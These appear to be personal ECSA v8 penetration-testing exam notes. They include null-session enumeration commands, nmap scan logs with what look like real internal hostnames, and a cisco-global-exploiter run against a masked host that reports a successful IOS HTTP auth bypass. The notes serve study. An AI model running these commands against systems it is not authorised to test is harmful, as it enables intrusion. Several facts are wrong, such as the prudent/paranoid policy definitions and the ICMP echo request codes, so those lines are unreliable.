Rough hints v8
ECSA V8 Key Learnings: Hints for Exam
ECSA v8 Key Learnings / Takeaways for Exam
By: Manju Devaraj

Data leaks -> Rogue Employee & Insider Attacker.
More than 75% of Budget --> is Non IT/Security.
Core Focus in IT security -> AAA & CIA & Non Repudiation.
Risk = loss * exposure factor
IDLE scan - Packet sent to zombie Computer. Open port - packet with IPID 31400, response will be 31401.
Metamorphic Virus - code rewrites & signature changes, but functionality stays same.
Policies - Promiscuous Policy, Permissive Policy, Prudent, Paranoid policy
Prudent Security Policy: Provides max security, all services are blocked, nothing is allowed, everything is logged.
Permissive Security Policy: Policy begins wide open, known dangers & attacks are blocked, impossible to keep up with current exploits.
Port no's above 1024, registered for vendor specific applications. Until 1024 are Well known ports.
Positive acknowledgment with retransmission guarantees reliable delivery of data.
Windowing: Improve flow control & reliability
TCP header fields, IDS, NIDS, IP Fragmentation ...to be prepared
DoS Syn Flooding takes advantage of flaw in how hosts implement 3 way handshakes.
IDS evasion Techniques are modifications made to attack in order to prevent detection by an IDS.
WIDSs monitor & evaluate user & system activities, identify known attacks, determine abnormal activity, determine abnormal network activity, policy violation over WLAN, Spoofing & MITM attack.

Password cracking attacks
• Dictionary: Dictionary db loaded
• Bruteforce: tries every combination.
• Hybrid: works like dictionary but adds some no's & symbols to words in dictionary.
• Syllable: Combination of Brute force & dictionary
• Rule based: used when attacker gets some info about password.

Passwords are hashed & stored in SAM located in windows\system32\config\SAM
Linux: /etc/passwd or /etc/shadow
Rainbow tables contain pre-computed hashes of Passwords. Precompiled hash table.

Social Engineering Types
• Vishing: Scamming users to surrender private info using telephone lines.
• Dumpster diving: Searching info in disposal areas still yet to be destroyed.
• Shoulder Surfing: Looking over shoulder to gain/gather info.
• Phishing: Using fake websites to redirect, emails contain suspicious attachments.
• Accomplice: method is associated with bribing, handing out gifts, personally involving to become a friend.
• Identity Theft: Stealing your name or personal info for fraudulent purpose

Web 2.0 provides more attack surface for web exploitation, SQL injection is the biggest threat to web 2.0
Web spidering tools like Burp Suite used to mirror a target website.
Web Parameter tampering attack involves manipulation of parameters exchanged between client & server in order to modify application data such as user credential & permissions, price & quantity of products. Best way to protect web applications from this is to apply effective input field filtering.
SQL injection: takes advantage of non-validated input vulnerabilities to pass SQL commands through a web application.
LDAP injection attacks are similar to SQL injection attack but exploit user parameter to generate LDAP query.
In SOAP injection attack, attacker injects malicious query strings into the user field to bypass Service authentication mechanisms & access backend db.
Functional Testing falls within the scope of black box testing; & it's not required to have the knowledge of inner design of the code or logic.

SQL injection Vulnerabilities:
• Detect SQL injection issues
• Detect input Sanitization
• Detect Truncation issues
• Detect SQL modification issues

Challenges to IT Security.
• Environment complexity - Insecure Network Design, Multivendor Environment
• New Technologies - Tunnel to Bypass access Controls.
• New Threats & Exploits - Avg every 4 hours new threats are discovered.
• Limited focus on Security.
• Limited security expertise.
• Environmental Complexity

firewalk
Tries to discover firewall rules using an IP TTL expiration technique known as firewalking.
nmap --script=firewalk --traceroute 64.54.40.3.2
nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1 <host>
nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms <host>

While doing Pen Test: Create a log of all actions, results & Findings.
http/1.1 error page msg code 407 -> Proxy Auth required

ICMP
• Type 3 Code 3 -> Dest port unreachable
• Type 3 Code 2 -> Dest protocol unreachable
• Type 3 code 13 -> administratively blocked
• Type 0 Code 0 - echo reply
• Type 0 code 8 - Echo Request

Codes:
0 Net Unreachable
1 Host Unreachable
2 Protocol Unreachable
3 Port Unreachable
4 Fragmentation Needed and Don't Fragment was Set
5 Source Route Failed
6 Destination Network Unknown
7 Destination Host Unknown

Pentest is actively evaluating the security of an information system or network by simulating an attack. Goes one step further than vulnerability testing. Adapts in-depth ethical hacking.
Blue Team - Test run with the knowledge of org's IT staff.
Red Team - Pentest run without knowledge of (informing the) IT staff, but with consent of Upper Mgmt.

Pen Testing Types
Black box - Blind testing & double blind - no knowledge of infra. before.
White Box - Announced & unannounced - Has complete knowledge of infra.
Grey Box - Combination of Black box & unannounced testing - Limited knowledge.

Pen Test Phases
• Pre-attack Phase - Passive Reconnaissance & Active reconn
• Attack Phase - Perimeter, Web Application & Wireless Testing ..etc
• Post attack phase - Removing all files & cleaning registry

Network Security Assessment Activity in Attack phase -> Identifies Vulnerabilities & helps to improve Enterprise Security Policy.
Application Security Assessment -> Source code Review, Authorization Testing, Functionality Testing, Web penetration Testing.
Legal Agreement -> Scope of project & Consent of Company.
Rule of Engagement/behavior -> requires Signature from both Pen tester & the Company.
Pen Test Pricing Report -> No. of Client Computer/IP's to be Tested & Resource Required, Time to Finish the project.
Tiger Team -> A Group of People hired to give details of the Vulnerabilities present in the system.
Passive info gathering -> From Public Sources. Eg: Using Netcraft
Active info Gath -> Social engineering, on-site visits, face-to-face interviews & Tools. Eg: Using Nessus (makes too much noise).
Nessus - Scripting language is NASL which can be used to create Custom Scripts.
Filetype:ppt -> finds ppts on Google
Gramm-Leach-Bliley Act -> protect consumers' personal financial information held by financial institutions and their service providers.
Family Educational Rights and Privacy Act (FERPA) for Students.
Active IDS - IDS cuts off your connection when running a vulnerability scan on a network.
Google Search hackrouter.com -> will produce all sites that link to the hackrouter.com.
XMAS scan: most of the ports scanned do not give a response - Ports are in Open state.

DNS zone transfer comes in two flavors, full (opcode AXFR) and incremental (IXFR).
#dig example.com axfr
When a DNS zone transfer is allowed, you should get a complete listing of all DNS entries that have been made in the DNS server for this domain. If the DNS server doesn't allow it, you will get an error indicating that the Zone transfer didn't work.
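For checking that your own name servers refuse transfers, this added example (not part of the original notes) shows what the dig command above puts on the wire and how the two outcomes differ in the first reply. On the wire AXFR is query type 252 carried over TCP; the zone name, transaction id and both sample replies are constructed for illustration.

```python
import struct

QTYPE_SOA, QTYPE_AXFR = 6, 252                  # RFC 1035 type codes
RCODES = {0: "NOERROR", 2: "SERVFAIL", 5: "REFUSED", 9: "NOTAUTH"}

def encode_name(name):
    """Domain name as length-prefixed labels terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def frame(msg):
    """DNS over TCP prefixes every message with its 2-byte length."""
    return struct.pack("!H", len(msg)) + msg

def build_axfr_query(zone, txid=0x1A2B):
    """One question, no flags set, QTYPE=AXFR, QCLASS=IN."""
    header = struct.pack("!6H", txid, 0, 1, 0, 0, 0)
    return frame(header + encode_name(zone) + struct.pack("!HH", QTYPE_AXFR, 1))

def skip_name(msg, pos):
    """Return the offset just past the (possibly compressed) name at pos."""
    while True:
        n = msg[pos]
        if n == 0:
            return pos + 1
        if n & 0xC0 == 0xC0:                    # compression pointer ends the name
            return pos + 2
        pos += 1 + n

def classify_reply(framed):
    """Return (verdict, rcode_name) for the first framed reply to an AXFR query."""
    (length,) = struct.unpack("!H", framed[:2])
    msg = framed[2:2 + length]
    if length < 12 or len(msg) != length:
        raise ValueError("truncated DNS message")
    _txid, flags, qd, an, _ns, _ar = struct.unpack("!6H", msg[:12])
    rcode = RCODES.get(flags & 0x000F, "RCODE%d" % (flags & 0x000F))
    if rcode != "NOERROR":
        return "refused", rcode
    if an == 0:
        return "empty", rcode
    pos = 12
    for _ in range(qd):                         # skip the echoed question section
        pos = skip_name(msg, pos) + 4
    pos = skip_name(msg, pos)                   # owner name of the first answer
    (rtype,) = struct.unpack("!H", msg[pos:pos + 2])
    # A zone transfer always starts with the zone's SOA record.
    return ("allowed" if rtype == QTYPE_SOA else "unexpected"), rcode

# Constructed sample replies (not captured from any real server).
_question = encode_name("example.com") + struct.pack("!HH", QTYPE_AXFR, 1)
_soa_rdata = (encode_name("ns1.example.com") + encode_name("hostmaster.example.com")
              + struct.pack("!5I", 2024010101, 7200, 900, 1209600, 300))
_soa_rr = (b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_SOA, 1, 3600, len(_soa_rdata))
           + _soa_rdata)
REFUSED_REPLY = frame(struct.pack("!6H", 0x1A2B, 0x8005, 1, 0, 0, 0) + _question)
ALLOWED_REPLY = frame(struct.pack("!6H", 0x1A2B, 0x8400, 1, 1, 0, 0) + _question + _soa_rr)

if __name__ == "__main__":
    print(build_axfr_query("example.com").hex())
    print(classify_reply(REFUSED_REPLY), classify_reply(ALLOWED_REPLY))
```

A server that returns REFUSED or NOTAUTH here is behaving as the countermeasure intends; an SOA in the first answer means the zone is being handed out.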
Source & Destination port in TCP header 16 bits -> 2^16 = 65536
Ack no./Sequence No. -> 32 Bit
WinXP Repair Risk -> Pressing Shift+F10 gives the user administrative rights.

Null Session hijacking
>net use \\10.10.2.225\ipc$ "" "/user:"
>net use
Glean information - With a null session connection, you can now use other utilities to gather critical Windows information remotely. Dozens of tools can gather this type of information.
net view \\10.10.2.225
Winfo and DumpSec can gather useful information about users and configurations, such as
• Windows domain to which the system belongs
• Security policy settings
• Local usernames
• Drive shares

Countermeasures against null session hacks
Block NetBIOS on your Windows server by preventing these TCP ports from passing through your network firewall or personal firewall:
• 139 (NetBIOS sessions services)
• Disable File and Printer Sharing for Microsoft Networks in the Properties tab of the machine's
• Restrict anonymous connections to the system. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous to a DWORD value as follows:
• None: This is the default setting.
• Rely on Default Permissions (Setting 0): This setting allows the default null session connections.
• Do Not Allow Enumeration of SAM Accounts and Shares (Setting 1): This is the medium security level setting. This setting still allows null sessions to be mapped to IPC$, enabling such tools as Walksam to garner information from the system.
• No Access without Explicit Anonymous Permissions (Setting 2): This high security setting prevents null session connections and system enumeration.

Nmap Vulnerability scanning
nmap -sV --script=vulscan www.example.com
@echo Courtesy manju Devaraj
cd C:\Program Files\Nmap
cmd /c nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 10.186.27.1-254 > c:\temp\10.186.27.0.txt

nmap -iL c:\temp\ips.txt -sn -PS
Nmap scan report for phsv-rdscb2.ghmh.org (10.186.27.2)
Host is up (0.00s latency).
MAC Address: 00:50:56:A5:16:F5 (VMware)
Nmap scan report for 10.186.27.5
Host is up (0.00s latency).
MAC Address: 00:50:56:A5:56:F4 (VMware)
Nmap scan report for phsv-print1.ghmh.org (10.186.27.7)
Host is up (0.00s latency).
MAC Address: 00:50:56:A5:75:57 (VMware)
Nmap done: 9 IP addresses (3 hosts up) scanned in 3.25 seconds

HOST DISCOVERY:
-PO[protocol list]: IP Protocol Ping
-Pn: Treat all hosts as online -- skip host discovery

nmap -iL c:\temp\ips.txt -sn -P0
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 05:46 Eastern Standard Time
Nmap scan report for 10.186.27.1
Host is up.
Nmap scan report for phsv-rdscb2.ghmh.org (10.186.27.2)
Host is up.
Nmap scan report for 10.186.27.3
Host is up.
Nmap scan report for 10.186.27.4
Host is up.
Nmap scan report for 10.186.27.5
Host is up.
Nmap scan report for 10.186.27.6
Host is up.
Nmap scan report for phsv-print1.ghmh.org (10.186.27.7)
Host is up.
Nmap scan report for 10.186.27.8
Host is up.
Nmap scan report for 10.186.27.9
Host is up.
Nmap done: 9 IP addresses (9 hosts up) scanned in 0.27 seconds

nmap -iL c:\temp\ips.txt -P0 -sU -p139,445,139,80 -v

C:\Program Files\Nmap>nmap -iL c:\temp\ips.txt -P0 -sU -p1-500
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 05:57 Eastern Standard Time
Nmap scan report for phsv-rdscb2.ghmh.org (10.186.27.2)
Host is up (0.00s latency).
Not shown: 495 closed ports
PORT    STATE         SERVICE
123/udp open|filtered ntp
137/udp open          netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
500/udp open|filtered isakmp
MAC Address: 00:50:56:A5:16:F5 (VMware)
Nmap scan report for 10.186.27.5
Host is up (0.00s latency).
Not shown: 493 closed ports
PORT    STATE         SERVICE
123/udp open|filtered ntp
137/udp open          netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
MAC Address: 00:50:56:A5:56:F4 (VMware)
Nmap scan report for phsv-print1.ghmh.org (10.186.27.7)
Host is up (0.00s latency).
Not shown: 495 closed ports
PORT    STATE         SERVICE
123/udp open|filtered ntp
137/udp open          netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
500/udp open|filtered isakmp
MAC Address: 00:50:56:A5:75:57 (VMware)
Nmap done: 9 IP addresses (3 hosts up) scanned in 309.64 seconds

nmap -v -sn 192.168.0.0/16 10.0.0.0/8
nmap -v -iR 10000 -Pn -p 80
! iR -> random Targets
nmap -iL c:\temp\ips.txt -P0 -sU -p1-1024 -vv -sV -O
! UDP scan - port range, double verbose, SV - probe to determine version of service, version of OS

Xmas scan (-sX)
Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. These three scan types are exactly the same in behavior except for the TCP flags set in probe packets. If a RST packet is received, the port is considered closed, while no response means it is open|filtered. The port is marked filtered if an ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) is received.

C:\Program Files\Nmap>nmap -sR 10.186.27.12 -P0 -sT -p1-1024 -vv -sV -O
WARNING: -sR is now an alias for -sV and activates version detection as well as RPC scan.
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 06:31 Eastern Standard Time
NSE: Loaded 23 scripts for scanning.
Initiating ARP Ping Scan at 06:31
Scanning 10.186.27.12 [1 port]
Completed ARP Ping Scan at 06:31, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:31
Completed Parallel DNS resolution of 1 host. at 06:31, 0.00s elapsed
Initiating Connect Scan at 06:31
Scanning 10.186.27.12 [1024 ports]
Discovered open port 135/tcp on 10.186.27.12
Discovered open port 445/tcp on 10.186.27.12
Discovered open port 139/tcp on 10.186.27.12
Completed Connect Scan at 06:32, 45.91s elapsed (1024 total ports)
Initiating Service scan at 06:32
Scanning 3 services on 10.186.27.12
Completed Service scan at 06:32, 6.03s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.186.27.12
NSE: Script scanning 10.186.27.12.
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 10.186.27.12
Host is up (0.00s latency).
Scanned at 2013-11-13 06:31:59 Eastern Standard Time for 53s
Not shown: 1021 filtered ports
PORT    STATE SERVICE     VERSION
135/tcp open  msrpc       Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  netbios-ssn
MAC Address: 00:50:56:A5:75:3A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|2008
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_8
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, or Windows 8
Uptime guess: 7.366 days (since Tue Nov 05 21:45:37 2013)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: C:\Program Files\Nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.46 seconds
Raw packets sent: 17 (1.446KB) | Rcvd: 17 (1.358KB)
C:\Program Files\Nmap>

Form Scalpel: used for dissecting HTML Forms, tool can extract all HTML forms from pages.

BackTrack to exploit Cisco IOS vulnerability
root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl
Usage :
perl cge.pl <target> <vulnerability number>
Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability
root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl *0.2*.*4.1 3
Vulnerability successful exploited with [http://*0.2*.*4.1/level/17/exec/....] ...
/level/$NUMBER/exec/show/config/cr where $NUMBER is an integer between 16 and 99.
root@skull:/pentest/cisco/cisco-global-exploiter# firefox http://*0.2*.*4.1/level/17/exec/....
http://10.10.0.21/level/99/exec/show/config
Click cancel to the logon box and enter the following address:

Information technology risk
Risk = Threat × Vulnerability × Asset Value
Fuzzing Attack - Injection Technique
A fuzzer is a program which automatically injects semi-random data into a program/stack and detects bugs.
The Fuzzing Scan does just as described above; it generates totally random input for the specified request parameters for a specified number of requests, hoping to provoke some kind of unexpected . By default the generated values will be between 5 and 15 characters in length and mutated 100 times;
Inputting Massive Amount of Data to Crash the Web Application.
• Dumb Fuzz Testing
• Smart Fuzz Testing - Knowing underlying structure of database, supply huge inputs accordingly.
Anonymiser - can be used to get around the Blocked access
Information Vulnerability - Job Posting's other postings exposing the information about the Technology.
Citrix Server's Port - 2598 is used to scan a network to find the Citrix machines.

Stacheldraht
The original DDOS tool "Stacheldraht" - a German word means 'Barbed wires' - is released during the middle of 1999. The Stacheldraht works on most Solaris and Linux systems. The original Stacheldraht, written by hacker 'randomizer', was found to be running on most of the Solaris platform because the Linux version is quite broken. Stacheldraht by itself is a malicious program that covers its track within a compromised system and communicates by covert channel and encryption on the network. The attacker could control hundreds or thousands of compromised systems via a single command line interface and launch different types of DoS attack to victim afterward. It combines the features available from Trinoo, TFN and adds some new DDOS attacks.
http://packetstormsecurity.com/distributed

Common Vulnerabilities and Exposures (CVE®) - Submit the IDS Logs for any new vulnerability.
Software Firewalls operate at DLL.